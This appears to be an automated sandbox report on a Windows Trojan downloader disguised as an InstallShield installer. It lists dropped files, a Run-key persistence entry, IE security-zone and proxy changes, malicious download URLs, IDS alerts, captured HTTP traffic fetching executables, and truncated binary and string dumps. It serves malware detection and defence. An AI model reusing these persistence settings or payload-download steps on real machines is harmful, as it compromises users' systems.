MD5: 257e0dfad8ebd0db9ff57f0a3421ba3a
SHA1: 0642fbaef019f924842a2d9d6dd8c07388f60305
SHA256: a777e768feea137b32f9be1bf7556f7de9d4b816a42e35f600186f19963fb162
SSDeep: 24576:wtb20pkaCqT5TBWgNQ7aGKbf U7Y9cVTg1IytSXheX9TmE2aYDwskuZrSKVps6A:5Vg5tQ7aGG709AyYXhYdwjwskuZE5
Size: 1811968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AppsInstaller
Created at: 2014-10-27 17:49:40
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1600
Setup.exe:1688
doc.exe:640
Index.exe:1204

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (0 bytes)

The process doc.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)

The process Index.exe:1204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (0 bytes)

Registry activity

The process %original file name%.exe:1600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 6A 7B AD 4B 84 F4 D1 8B 51 8D 37 D4 A6 E3 C5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_Games_pl" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"setup.exe" = "InstallScript Setup Launcher Unicode"
"Index.exe" = "Index"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process Setup.exe:1688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 AC 55 F6 F2 8F 8A 66 53 69 1B 85 BB 9B 2E B3"

The process doc.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_GamesID" = "181019"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A6 62 EF CC CA 58 D3 C1 12 CA A5 7B B3 9B FF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Index.exe:1204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 72 DE AA A7 F2 D6 F1 84 E2 F3 62 5E EC 85 A1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://installs.cpa-install.com/ClientFiles/get/5	104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/updater.exe	104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/google.exe	104.28.5.102
hxxp://www1.somdows.com/computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs=	104.28.20.61

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /ClientFiles/get/5 HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 20 Dec 2014 06:52:46 GMT

Content-Type: text/plain; charset=UTF-8

Content-Length: 232

Connection: keep-alive

Set-Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366; expires=Sun, 20-Dec-15 06:52:46 GMT; path=/; domain=.cpa-install.com; HttpOnly

X-Powered-By: PHP/5.4.34

X-Frame-Options: ALLOWALL

Server: cloudflare-nginx

CF-RAY: 19b9eb48752206a3-EWR
hXXp://installs.cpa-install.com/update/client_1/updater.exe$one.exe$@A
ppDataDir$\Google\int$HKEY_CURRENT_USER\Software\Microsoft\Windows\Cur
rentVersion\Run$Microsoft.hXXp://installs.cpa-install.com/update/clien
t_1/google.exe$doc.exe....


GET /update/client_1/updater.exe HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366

HTTP/1.1 200 OK

Date: Sat, 20 Dec 2014 06:52:47 GMT

Content-Type: application/x-msdownload

Content-Length: 908800

Connection: keep-alive

Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT

Accept-Ranges: bytes

X-Frame-Options: ALLOWALL

Server: cloudflare-nginx

CF-RAY: 19b9eb4aa56c06a3-EWR
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........d..........
....'.a.....H.k.....H.h.....H.i......}%......}5...............~.......
k.......o.......1.......j.....Rich....................PE..L...0^.T....
......"..........$......t_............@..........................@....
..|&....@...@[email protected]..|[email protected]..............
........Ll..................................0'..@...............`.....
.......................text...O........................... ..`.rdata..
B...........................@[email protected]..................@.
[email protected]..................@[email protected]......
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................U..V...6.......u&.E..0j.j.
.6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H.........
[email protected]..].j....E..]....M......Q..j.X.E.......E..H....
E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J..
..E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.
@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.
F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$
$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>

GET /update/client_1/google.exe HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

Cookie: __cfduid=d756b152af0af3b7980b30079183458671419058366

HTTP/1.1 200 OK

Date: Sat, 20 Dec 2014 06:53:04 GMT

Content-Type: application/x-msdownload

Content-Length: 913920

Connection: keep-alive

Last-Modified: Fri, 19 Dec 2014 17:25:16 GMT

Accept-Ranges: bytes

X-Frame-Options: ALLOWALL

Server: cloudflare-nginx

CF-RAY: 19b9ebb952e806a3-EWR
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........d..........
....'.a.....H.k.....H.h.....H.i......}%......}5...............~.......
k.......o.......1.......j.....Rich....................PE..L...#^.T....
......"..........8......t_............@..........................`....
... ....@...@[email protected]..|....@...`..............
........Ll..................................0'..@...............`.....
.......................text...O........................... ..`.rdata..
B...........................@[email protected]..................@.
...rsrc....`[email protected]..................@[email protected]......
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................U..V...6.......u&.E..0j.j.
.6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H.........
[email protected]..].j....E..]....M......Q..j.X.E.......E..H....
E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J..
..E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.
@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.
F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$
$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>

GET /computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214290322156/XP1/5.1/0&com=a&pl=5&prog_installs= HTTP/1.1

User-Agent: AutoIt

Host: www1.somdows.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 20 Dec 2014 06:53:49 GMT

Content-Type: text/plain; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=df6ea2ee355f5e3364ff5eabad83959bb1419058426; expires=Sun, 20-Dec-15 06:53:46 GMT; path=/; domain=.somdows.com; HttpOnly

Vary: Accept-Encoding

X-Powered-By: PHP/5.4.34

X-Frame-Options: ALLOWALL

Server: cloudflare-nginx

CF-RAY: 19b9ecbd73fb0773-EWR
173..181019.7$bdMin..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t&SSh

}j%Xf;

SSSSh0u

PSSh@`G

CMDhX

GetSystemWindowsDirectoryW

RegCreateKeyTransactedW

%d@wd

uRegDeleteKeyTransactedW

setup.exe

.debug

.rdata

setup.cpp

ISSetup.dll

setup.inx

layout.bin

Kernel32.dll

InternetOpenUrlW

InternetCrackUrlW

InternetCreateUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

HttpSendRequestExW

HttpEndRequestW

InternetCanonicalizeUrlW

FtpFindFirstFileA

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

skin.ini

-x

RegOpenKeyTransactedW

COMCTL32.dll

VERSION.dll

LZ32.dll

msi.dll

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

MsgWaitForMultipleObjects

CreateDialogIndirectParamW

USER32.dll

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegEnumKeyExW

RegQueryInfoKeyW

ADVAPI32.dll

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

RPCRT4.dll

gdiplus.dll

GetCPInfo

ExitWindowsEx

EnumChildWindows

SetViewportExtEx

SetViewportOrgEx

RegOpenKeyW

RegEnumKeyW

.?AVhttp_file@is@@

zcÁ

.BFAM

.xbb6

W.oln

sJ.um

11111118

222222222

7777@@@@

2222222

222222222222

22222222222

2222222222

''''~~~~

777@7@@@

--$$#!!!!

7777777

111118111

22222222

FFFrCrTrTTTTTTTTTTTTTTTTTrTrTrrrrrrrFrrbFbbbFbbbbbbbbbbbbbbbbbooooooooooooooooo

!!##$$$$#

.....zzbF

...zzbFF)

0000000

11111111

1111111

|||:||||

,6,6,666

))):||||

2222222222222

222222222222222

):::||||

;{;{;;3;

{;{{;;{;

6,66,,,,

6,,666,,,

>>>///>///>>>

,6,,6,,,

>>/>//>/

>//>/>>>

///>>/>/>

#$)))'--'-..1/..1...,,. ',  (& &(,&&(,&,&(&,& ',&,(,&,,, ,046782

#!#&))-&--1'...   ,,,&&(,&&(& (,&'(,&'(&,&'&(&(&'&'&(&&',&,,0465

$#!)))'&--'*. (,(,,(,&(,&'(,&&(&',&&'&,'&',&,&,& (,&,& (,&,& &.5.

#$!)))-)-*-,&  & &'& (&&,&(',&&,&&',&'&,&(&'(&&(&&&'&(&(&(&'(,&,,

$$!#&)&&'& ,&&(&(,(,&& (&,& &',&',&',&'& ',&,&,&,(,&,&,& &,&,',& 

#$)!))&',&,&,',&,&'& (,&& &'&''&'&'&'&&&''&'&&'(&'&'&'(&'(&&'&&',&

$$!#*'*'* ,&&',&&'&&&&'"&&&&!&

!&&'&'(&(&&&'(&'&&'&'&((& &

#&&'&'&'&'&&&!&&!&

&&&',& &,(,&,&,(,&,&,& &(&

#!&&''!&&!&

!& (&(&(&'&'&&&'&'&((&'(& &

!)&,&&&!&

&'& &',&(,&,(,&,&,& &,&,(&

#!&&',&&&&!!

&&' ',&& &'&'&'(&'(&(&&'&'&

!& ,', (,&(,&,&,&,&,& (,&,&,

$!!)&& &',&''&&"!

!!)&!''.,//,/',&&'(&'(&&&'&(&(&'&'

!$!)'&- /,///.01021//,',&,&,&,',(,&,&,&,&&

'&&&&!&!$

$#!&))&.'./10/4222442420/, &'(&&'&(&'&&'&'&'(,&

&&'&'&/#

&&'"%"%!!

!&&"&&&"%&!%!$!$!))&'-. 1/22244447474442//'&,&,&,&,& (,&,&,&&'&'

)"&"&"&"'&"&&"&!&&&&---.//2224447464474420, (&'(&&'&(&&'&'(&',&,&

!&"'&&&,& &',06878787440 ,&,& &,(,& (,& (,&,& (,& 

!&&&'(,&(&(&& 478878470.,'&(&(&&'&(&(&('(&&&'(&'&(

&"'&(&(& &'&&/47787745 ',&,& (,&,&,& &,& (,&,&,&'

$'&&(&&&,&(&&&&.7877460 (&'&(&&'(&&'&(&&'(&'&&'&,&

&&'&&'(&&(&'&& .478854,,&,&,& (,& (,& (,&,&,(,&,&(

&'&,(& (,& &'&&,,68764,,&&'(&(&'&(&(&&(&(&&'&'(&'&

!)&'. /.,/ &(,&& &&',,0744.('(&'&&'&(&&'&'&(&(&&'&'(&'&

$!)&&- .,//2/// ,&&'(&,& &(,.40.,&'(&&'&'(&'(&(&&'&(&'(&'(&&'

#!&)'*. ../2//2, & (& &'&(& &,45 ((,& (,&,&,&,& (,&,&,&,&,& (&

#$!)&- . /10/2///'(&&&'(,&,&(,,.., '&(&(&(&'&(&'(&'(&'&(&&'(&,&

!#&)'. //1/02300, &&(,&&&'&',&,,,,&(,&,& &,',&,&,&,&,&,& (,&&'&

!)&- .,/010202/ '(&&&,(,&,&&',,&,&&&'&(&(&&&'&&'(&&'&'(&&& (,&

! ! !!&'- .0/102240.'(&&(&'&'(&(,&,',& (,&,& &,(,&,&,& (,&,& (,&&&'

! "!!&& //.202440.,,'(&&&(,& &'&(&'&(&&'&(&'(&''((&(&(&'(&('(&'(,&

" ! "!&& /.2024.440'&&&'&,&(&(,&,&,&,& (,&,&,&,&,& & &,&,&,& &,',&'

! "!"! !'/1244420,'&'&&&'(&&',&,&,& (,& (,&,&,&,& & &,(,&,&,& (,&,

'.42442, (&&(&(&(&,&&'&(&'(&'&(&&&'&&(&'(&(&&&'&&(&'(&'(&

"! !!!&/24445 &&'&&&'&&'(,&,&,&,&,&,& (,&,&,&,&,& (,&,&,&,&,& &

"! ! ! &,0472.'(&&&'(&(&(&'(&(&'&&&'&((&'((&'&&'&((&'((&'&&'&((&

! " "!"! " 0440,'&&&'&&&&(&',& &,',(,&,& &,& &,(,&,& &,& &,(,&,& &

"! " !&'.445''&'"&'(&&&&(&&(&(&&'&(&'((&'(&&'&(&'((&'(&&'&(&'(&

!! "! "!&"&,24.(&&&&'&'&(&(&(,& & (,& &,& &,& (,& &,& &,& (,& &,& 

!" ! ""& .5,'&"'"&&&'&'& &(&((&((&((&((&((&((&((&((&((&((&((&('

!"!&"&"'..,'&&&''&'&&'&',& & & & & & & & & & & & & & & & & & &

! &"   "&& &&'&&'&&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'(

&[[[[FKEEEC?953).ILSPPRRPSTVVWYYZZZ[[[[[[Q&

####'"""!

7<##''(,,-28!

##''((,-6!

DrF.Df2

.WW.{

3333333

version="1.0.0.0"

name="InstallShield.Setup"

<description>InstallShield.Setup</description>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">

</asmv3:windowsSettings>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="InstallShield.Setup" type="win32"></assemblyIdentity><description>InstallShield.Setup</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

@File=%s

Folder=%s

explorer.exe

@hXXp://

0xx

123.tmp

KERNEL32.DLL

>%s (%d)

PAPP:%s

PVENDOR:%s

PGUID:%s

ErrorInformation=%s

setup.log

%ld : 0x%x

@.msi

..\..\Shared\Setup\IsPreReqDlg.cpp

Prerequisites need elevation; launching elevated with arguments: %s

MSI or .NET rebooting before prerequsite

StartStopProgress - Fallback - %d of %d

Software\Microsoft\Windows\CurrentVersion

%%IS_PREREQ%%-%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

%s.%s

%s: %s

Default.prq

DownloadFiles: %s

XXXXXXXXXXXXXXXX

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

hXXps://

installfromweb:

show_eval_msg

show_beta_msg

show_err_msg

show_err_msg_invalid_identity

ShowPasswordDialog

CompanyURL

hXXp://VVV.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%d : 0x%x&ErrorInfo=%s

ErrorReportURL

cmdline

Supported

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

data1.hdr

APTF://

data1.cab

MPR.DLL

This setup was created with a BETA VERSION of %s

This setup was created with a EVALUATION VERSION of %s

This setup was created with an EVALUATION VERSION of %s. Evaluation setups work for only %s hours after they were built. Please rebuild the setup to run it again. The setup will now exit.

EXE=%s

setup.ini

<Support>

